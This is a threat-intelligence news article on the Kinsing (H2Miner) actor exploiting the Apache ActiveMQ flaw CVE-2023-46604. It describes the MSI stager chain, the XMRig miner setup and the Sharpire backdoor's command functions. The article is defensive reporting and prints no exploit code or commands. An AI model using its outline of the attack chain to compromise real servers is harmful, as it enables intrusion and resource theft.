Kinsing Cryptominer Exploits Apache ActiveMQ RCE (CVE-2023-46604), Adds Sharpire Backdoor for Multi-Stage Intrusion
Ddos 
The AhnLab Security Intelligence Center (ASEC) has confirmed that the Kinsing threat actor β also known as H2Miner β continues to actively exploit known vulnerabilities, particularly CVE-2023-46604 in Apache ActiveMQ, to distribute cryptocurrency miners and remote-access tools across both Linux and Windows systems.
The campaign has recently expanded beyond its usual cryptomining activity, now involving multiple post-exploitation frameworks such as Cobalt Strike, Meterpreter, and PowerShell Empire, alongside a new .NET-based backdoor named Sharpire.
First identified by Alibaba Cloud Security in 2020, Kinsing is known for targeting misconfigured or unpatched servers to deploy XMRig miners. Over the years, the group has adapted its tactics to exploit several major vulnerabilities, including Log4Shell (CVE-2021-44228), misconfigured Docker API ports, and now, ActiveMQβs remote code execution flaw (CVE-2023-46604).
AhnLab explains: βThe Kinsing threat actor targets the Docker daemon API port with a misconfiguration, while for Redis, they exploit the remote code execution vulnerability. Other cases include the Log4j vulnerability (CVE-2021-44228) and the ActiveMQ vulnerability (CVE-2023-46604).β
Aside from vulnerability exploitation, Kinsing also leverages stolen SSH credentials during lateral movement to spread malware internally across compromised networks.
CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ, allowing unauthenticated attackers to run arbitrary commands on affected servers. The flaw resides in how OpenWire protocol handles serialized class types, which can be manipulated to load attacker-controlled XML configuration files.
AhnLabβs analysts noted that βif an unpatched Apache ActiveMQ server is exposed to the Internet, threat actors can remotely execute malicious commands and take control of the system.β The vulnerability has already been exploited by several major groups, including Andariel, HelloKitty ransomware, and Mauri ransomware, but AhnLabβs latest research highlights Kinsingβs continued and evolving use of the exploit.
In recent attacks observed in South Korea, Kinsing has deployed a chain of downloader malware to deliver secondary payloads. The infection begins when the vulnerable ActiveMQ Java process executes a malicious XML configuration file, which triggers msiexec.exe to download and install MSI-based malware. These βstagerβ components establish persistence and connect back to the attackerβs infrastructure for further payload delivery.
The Kinsing operation continues to maintain cross-platform capabilities. In addition to the Windows-based malware chain, AhnLab identified a Bash script targeting Linux environments, designed to configure the XMRig miner for illicit cryptocurrency mining. The script modifies the minerβs configuration file to include Kinsingβs wallet address, as confirmed by AhnLabβs telemetry and previous Fortinet research.
Perhaps the most notable finding in AhnLabβs report is the identification of Sharpire, a .NET-developed backdoor that supports PowerShell Empire, an open-source post-exploitation framework. Sharpire expands Kinsingβs toolkit for remote control, reconnaissance, and lateral movement.
AhnLabβs analysis shows that Sharpire can execute PowerShell commands, manage files, query network configurations, and even reboot or shut down compromised systems.
The malware supports over a dozen command functions, including βExecute PowerShell command,β βList directory,β βCheck network configuration information,β and βQuery current user.β
By integrating Cobalt Strike, Meterpreter, and Sharpire, Kinsing now exhibits capabilities more aligned with multi-stage intrusion and ransomware operators, signaling a clear escalation in threat sophistication.
Related Posts:
- Kinsing Cryptocurrency Miner Leverages Apache ActiveMQ Bug to Infect Linux Systems
- The Hidden Threat in Man Pages: Kinsing Malware Targets Apache Tomcat Servers
- Kinsing Threat Actor Targets Linux Flaw for Cloud Environment Breaches
- Openfire Bug (CVE-2023-32315) Exploited to Deploy Kinsing Malware and Cryptominer
- How Attackers Exploit and Then Patch a Vulnerability to Hide in Linux Systems
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
